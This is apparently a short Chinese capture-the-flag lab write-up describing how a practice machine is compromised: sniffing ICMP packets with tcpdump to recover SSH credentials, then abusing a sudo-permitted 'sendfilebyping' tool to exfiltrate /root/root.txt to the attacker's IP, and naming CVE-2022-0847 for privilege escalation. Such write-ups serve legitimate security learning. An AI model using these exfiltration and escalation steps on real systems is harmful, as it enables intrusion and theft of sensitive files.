-
端口

-
访问 80 端口

通过页面显示可以发现web尝试ping了访问者的IP地址
-
抓包使用wireshark分析
监听
tcpdump -i eth0 icmp -w icmp发现有四个请求包,其中两个包内含有用户名和密码



得到用户名和密码,使用ssh登录
-
执行
sudo -l
通过ping命令发送文件
本地监听
tcpdump -i eth0 icmp -w rev服务器执行
sudo sendfilebyping 192.168.0.128 /root/root.txt
将结果进行拼接得到flag

使用 CVE-2022-0847 提权

靶机渗透日记
最新推荐文章于 2026-01-04 07:16:05 发布
本文介绍了一种通过ping命令发送和接收数据的方法来获取敏感信息的过程。具体包括使用Wireshark抓包分析、通过监听ICMP请求包获取用户名密码、使用sendfilebyping命令发送文件,最终拼接得到Flag。
439

被折叠的 条评论
为什么被折叠?



